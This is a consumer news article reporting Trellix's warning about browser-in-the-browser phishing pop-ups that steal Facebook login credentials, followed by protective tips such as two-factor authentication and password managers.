1. News
  2. Browser-in-the-Browser: The New Facebook Phishing Attack That Targets Users’ Login Information

Browser-in-the-Browser: The New Facebook Phishing Attack That Targets Users’ Login Information

Facebook users, watch out for yet another scam technique: browser-in-browser phishing in legitimate-looking pop-up windows asking for login credentials and personal information.

Jackie LeavittAleksander Hougen

Written by Jackie Leavitt (Editor at Large)

Reviewed by Aleksander Hougen (Chief Editor)

Last Updated:

Facebook BitB Phishing featured image

Cybersecurity firm Trellix recently cautioned about a new “browser in the browser” (BitB) phishing technique on Facebook, where hackers aim to steal users’ login credentials to take over the account, steal their personal information, spread scams or commit identity fraud.

Here’s how it works: Scammers send a legitimate-looking phishing email from “Facebook” or a law firm, under the pretext of alerting the user about account suspension or violations, unauthorized login attempts, security updates, and even a legal notice.

That email will often include a shortened hyperlink disguised as a Facebook login link. Once clicked, it will redirect to a pop-up; the BitB technique creates a custom-built, fake window within the user’s legitimate browser window, which looks like a genuine Facebook pop-up.

Trellix’s investigation found examples even including a fake Meta captcha before directing to a “Facebook” login pop-up that contains the Facebook URL — which according to Trellix was hardcoded — making it seem like a legitimate and secure login window. 

The BitB pop-up will ask for basic information — such as full name, email address, phone number and date of birth — then ask the user to enter their password to continue. Entering this information gives the scammers all the information needed to access the account.

These phishing pages can also evade security filters because they are being hosted on legitimate cloud platforms, including Netlify and Vercel, according to Trellix.

What Facebook Users Can Do to Protect Themselves

If you’re worried that you or a loved one will fall for the BitB scam, here are a few things you can do to mitigate the risk.

  1. Implement two-factor authentication (2FA) on your Facebook account, so that even if scammers steal your login information, the 2FA prevents an account takeover. 
  2. Use a password manager for your login information; password managers make it very easy to change your password and not have to worry about remembering the new one. They can also autofill your information into approved URLs — so if your autofill doesn’t automatically add your login information to a page, be suspicious.
  3. Never click an email link and instead navigate directly to Facebook to check for notifications and account status. 
  4. Be suspicious of shortened URLs and of links that do not use the official facebook.com domain.
  5. Avoid using all pop-up login windows; genuine logins almost always redirect to a full-page login URL.
  6. Understand that Facebook is one of the most risky social platforms for scams, accounting for 78% of online social media scams, followed by YouTube (17.6%) and Instagram (2.2%), with the top scams rooted in ad/shopping followed by phishing.

It’s also questionable how much Facebook is working to address scams, especially when Reuters reported that Meta projected that 10% of its 2024 revenue would come from ads for scams/banned goods, and that Meta estimates its platform shows its 3 billion users 15 billion scam ads a day.

If you found this news article helpful, you might be interested in signing up for the Cloudwards newsletter below, where we email important weekly news and updates.

↑ Top